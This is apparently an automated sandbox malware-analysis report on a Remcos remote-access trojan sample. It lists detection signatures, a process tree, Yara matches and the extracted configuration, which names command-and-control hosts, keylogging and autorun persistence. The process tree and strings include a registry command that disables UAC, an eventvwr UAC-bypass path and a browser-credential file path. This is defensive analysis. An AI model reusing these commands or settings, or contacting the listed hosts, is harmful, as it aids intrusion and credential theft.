Edit tour

Windows Analysis Report
DB5rQYsfd6.exe

Overview

General Information

Sample name:	DB5rQYsfd6.exe renamed because original name is a hash value
Original sample name:	991e707e324731f86a43900e34070808.exe
Analysis ID:	1589220
MD5:	991e707e324731f86a43900e34070808
SHA1:	5b5afd8cecb865de3341510f38d217f47490eead
SHA256:	32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153
Tags:	exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates an undocumented autostart registry key

Delayed program exit found

Disables UAC (registry)

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: Potentially Suspicious GoogleUpdate Child Process

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspect Svchost Activity

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses cmd line tools excessively to alter registry or file data

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Unusual Parent Process For Cmd.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara signature match

Classification

Process Tree

System is w10x64

DB5rQYsfd6.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\DB5rQYsfd6.exe" MD5: 991E707E324731F86A43900E34070808)

cmd.exe (PID: 7328 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7380 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

wscript.exe (PID: 7420 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7828 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GoogleUpdate.exe (PID: 7888 cmdline: C:\ProgramData\GoogleDat\GoogleUpdate.exe MD5: 991E707E324731F86A43900E34070808)

cmd.exe (PID: 7904 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7992 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

svchost.exe (PID: 7944 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

GoogleUpdate.exe (PID: 8112 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)

GoogleUpdate.exe (PID: 8180 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)

GoogleUpdate.exe (PID: 1184 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)

GoogleUpdate.exe (PID: 1608 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)

GoogleUpdate.exe (PID: 7592 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)

GoogleUpdate.exe (PID: 7844 cmdline: "C:\ProgramData\GoogleDat\GoogleUpdate.exe" MD5: 991E707E324731F86A43900E34070808)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["198.50.242.157:443:0", "apleegodfivem.ddns.net:443:0"], "Assigned name": "paydaytry", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "GoogleUpdate.exe", "Startup value": "ChromeUpdater", "Hide file": "Disable", "Mutex": "Attempt-S4A0CI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "GoogleDat", "Keylog folder": "bootdata", "Keylog file max size": "0"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
DB5rQYsfd6.exe	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
DB5rQYsfd6.exe	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
DB5rQYsfd6.exe	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
DB5rQYsfd6.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\bootdata\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\ProgramData\GoogleDat\GoogleUpdate.exe	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\ProgramData\GoogleDat\GoogleUpdate.exe	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
C:\ProgramData\GoogleDat\GoogleUpdate.exe	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
C:\ProgramData\GoogleDat\GoogleUpdate.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x67a00:$a1: Remcos restarted by watchdog! 0x67f58:$a3: %02i:%02i:%02i:%03i 0x682dd:$a4: * Remcos v
0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000000.00000003.1665273424.000000000054C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x56b0:$a1: Remcos restarted by watchdog! 0x5c08:$a3: %02i:%02i:%02i:%03i 0x5f8d:$a4: * Remcos v
00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x86840:$a1: Remcos restarted by watchdog! 0x86d98:$a3: %02i:%02i:%02i:%03i 0x8711d:$a4: * Remcos v
0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
Process Memory Space: DB5rQYsfd6.exe PID: 7308	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: DB5rQYsfd6.exe PID: 7308	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6cf1:$a1: Remcos restarted by watchdog! 0x10c54:$a1: Remcos restarted by watchdog! 0x25236:$a1: Remcos restarted by watchdog! 0x7228:$a3: %02i:%02i:%02i:%03i 0x77e1:$a3: %02i:%02i:%02i:%03i 0x1118b:$a3: %02i:%02i:%02i:%03i 0x11744:$a3: %02i:%02i:%02i:%03i 0x2576d:$a3: %02i:%02i:%02i:%03i 0x25d26:$a3: %02i:%02i:%02i:%03i 0x744a:$a4: * Remcos v 0x113ad:$a4: * Remcos v 0x2598f:$a4: * Remcos v
Process Memory Space: GoogleUpdate.exe PID: 7888	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: GoogleUpdate.exe PID: 7888	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x7878:$a1: Remcos restarted by watchdog! 0x153df:$a1: Remcos restarted by watchdog! 0x2e1a0:$a1: Remcos restarted by watchdog! 0x3be5d:$a1: Remcos restarted by watchdog! 0x7daf:$a3: %02i:%02i:%02i:%03i 0x8368:$a3: %02i:%02i:%02i:%03i 0x15916:$a3: %02i:%02i:%02i:%03i 0x15eb4:$a3: %02i:%02i:%02i:%03i 0x2e6d4:$a3: %02i:%02i:%02i:%03i 0x2ec8d:$a3: %02i:%02i:%02i:%03i 0x3c394:$a3: %02i:%02i:%02i:%03i 0x3c94d:$a3: %02i:%02i:%02i:%03i 0x7fd1:$a4: * Remcos v 0x15b1d:$a4: * Remcos v 0x2e8f6:$a4: * Remcos v 0x3c5b6:$a4: * Remcos v
Process Memory Space: svchost.exe PID: 7944	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 7944	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xaf1f:$a1: Remcos restarted by watchdog! 0x1b3f3:$a1: Remcos restarted by watchdog! 0xb456:$a3: %02i:%02i:%02i:%03i 0xba0f:$a3: %02i:%02i:%02i:%03i 0x1b927:$a3: %02i:%02i:%02i:%03i 0x1bee0:$a3: %02i:%02i:%02i:%03i 0xb678:$a4: * Remcos v 0x1bb49:$a4: * Remcos v
Process Memory Space: GoogleUpdate.exe PID: 8112	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: GoogleUpdate.exe PID: 8112	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x724c:$a1: Remcos restarted by watchdog! 0x7783:$a3: %02i:%02i:%02i:%03i 0x7d3c:$a3: %02i:%02i:%02i:%03i 0x79a5:$a4: * Remcos v
Process Memory Space: GoogleUpdate.exe PID: 8180	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: GoogleUpdate.exe PID: 8180	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xc66a:$a1: Remcos restarted by watchdog! 0x177f8:$a1: Remcos restarted by watchdog! 0xcba1:$a3: %02i:%02i:%02i:%03i 0xd15a:$a3: %02i:%02i:%02i:%03i 0x17d2f:$a3: %02i:%02i:%02i:%03i 0x182e8:$a3: %02i:%02i:%02i:%03i 0xcdc3:$a4: * Remcos v 0x17f51:$a4: * Remcos v
Process Memory Space: GoogleUpdate.exe PID: 1184	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: GoogleUpdate.exe PID: 1184	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x883c:$a1: Remcos restarted by watchdog! 0x8d73:$a3: %02i:%02i:%02i:%03i 0x932c:$a3: %02i:%02i:%02i:%03i 0x8f95:$a4: * Remcos v
Process Memory Space: GoogleUpdate.exe PID: 1608	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: GoogleUpdate.exe PID: 1608	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x8b1b:$a1: Remcos restarted by watchdog! 0x1ae11:$a1: Remcos restarted by watchdog! 0x9052:$a3: %02i:%02i:%02i:%03i 0x960b:$a3: %02i:%02i:%02i:%03i 0x1b348:$a3: %02i:%02i:%02i:%03i 0x1b901:$a3: %02i:%02i:%02i:%03i 0x9274:$a4: * Remcos v 0x1b56a:$a4: * Remcos v
Process Memory Space: GoogleUpdate.exe PID: 7592	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: GoogleUpdate.exe PID: 7592	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x8aaa:$a1: Remcos restarted by watchdog! 0x8fe1:$a3: %02i:%02i:%02i:%03i 0x959a:$a3: %02i:%02i:%02i:%03i 0x9203:$a4: * Remcos v
Process Memory Space: GoogleUpdate.exe PID: 7844	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
